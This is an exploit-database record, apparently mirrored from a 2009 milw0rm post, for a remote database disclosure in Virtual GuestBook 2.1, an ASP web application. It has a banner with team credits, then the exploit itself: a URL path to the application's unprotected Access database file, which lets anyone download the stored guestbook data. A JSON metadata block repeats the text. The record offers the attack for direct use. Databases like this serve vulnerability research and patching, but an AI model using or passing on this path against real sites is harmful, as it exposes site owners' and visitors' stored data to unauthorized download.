ID EXPLOITPACK:E499D22AEFEB4C9FA6364F3D06F93DBE
Type exploitpack
Reporter Moudi
Modified 2009-01-13T00:00:00
Description
Virtual Guestbook 2.1 - Remote Database Disclosure
###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################
==============================================================================
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ / ___ \ | _ |
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|
==============================================================================
==============================================================================
Virtual GuestBook v2.1 Remote Database Disclosure Vulnerability
==============================================================================
[»] Script: [ Virtual GuestBook v2.1 ]
[»] Language: [ ASP ]
[»] Website: [ http://www.minitdesign.com/vgbook.asp ]
[»] Founder: [ Moudi <m0udi@9.cn> ]
[»] Thanks to: [ MiZoZ , ZuKa , str0ke , and all hackers... ]
[»] Team: [ EvilWay ]
###########################################################################
===[ Exploit ]===
[»] http://localhost/[path]/database/guestbook.mdb
Author: Moudi
###########################################################################
# milw0rm.com [2009-01-13]
{"lastseen": "2020-04-01T19:04:54", "references": [], "description": "\nVirtual Guestbook 2.1 - Remote Database Disclosure", "edition": 1, "reporter": "Moudi", "exploitpack": {"type": "webapps", "platform": "asp"}, "published": "2009-01-13T00:00:00", "title": "Virtual Guestbook 2.1 - Remote Database Disclosure", "type": "exploitpack", "enchantments": {"dependencies": {"references": [], "modified": "2020-04-01T19:04:54", "rev": 2}, "score": {"value": -0.3, "vector": "NONE", "modified": "2020-04-01T19:04:54", "rev": 2}, "vulnersScore": -0.3}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2009-01-13T00:00:00", "id": "EXPLOITPACK:E499D22AEFEB4C9FA6364F3D06F93DBE", "href": "", "viewCount": 1, "sourceData": "###########################################################################\n#-----------------------------I AM MUSLIM !!------------------------------#\n###########################################################################\n\n==============================================================================\n _ _ _ _ _ _ \n / \\ | | | | / \\ | | | |\n / _ \\ | | | | / _ \\ | |_| |\n / ___ \\ | |___ | |___ / ___ \\ | _ |\n IN THE NAME OF /_/ \\_\\ |_____| |_____| /_/ \\_\\ |_| |_|\n \n\n==============================================================================\n\n==============================================================================\n Virtual GuestBook v2.1 Remote Database Disclosure Vulnerability\n==============================================================================\n\n\t[\u00c2\u00bb] Script: [ Virtual GuestBook v2.1 ]\n\t[\u00c2\u00bb] Language: [ ASP ]\n\t[\u00c2\u00bb] Website: [ http://www.minitdesign.com/vgbook.asp ]\n\t[\u00c2\u00bb] Founder: [ Moudi <m0udi@9.cn> ]\n [\u00c2\u00bb] Thanks to: [ MiZoZ , ZuKa , str0ke , and all hackers... ]\n [\u00c2\u00bb] Team: [ EvilWay ]\n\n###########################################################################\n\n===[ Exploit ]===\t\n\t\n\t[\u00c2\u00bb] http://localhost/[path]/database/guestbook.mdb\n\n\nAuthor: Moudi\n\n###########################################################################\n\n# milw0rm.com [2009-01-13]", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": []}
{}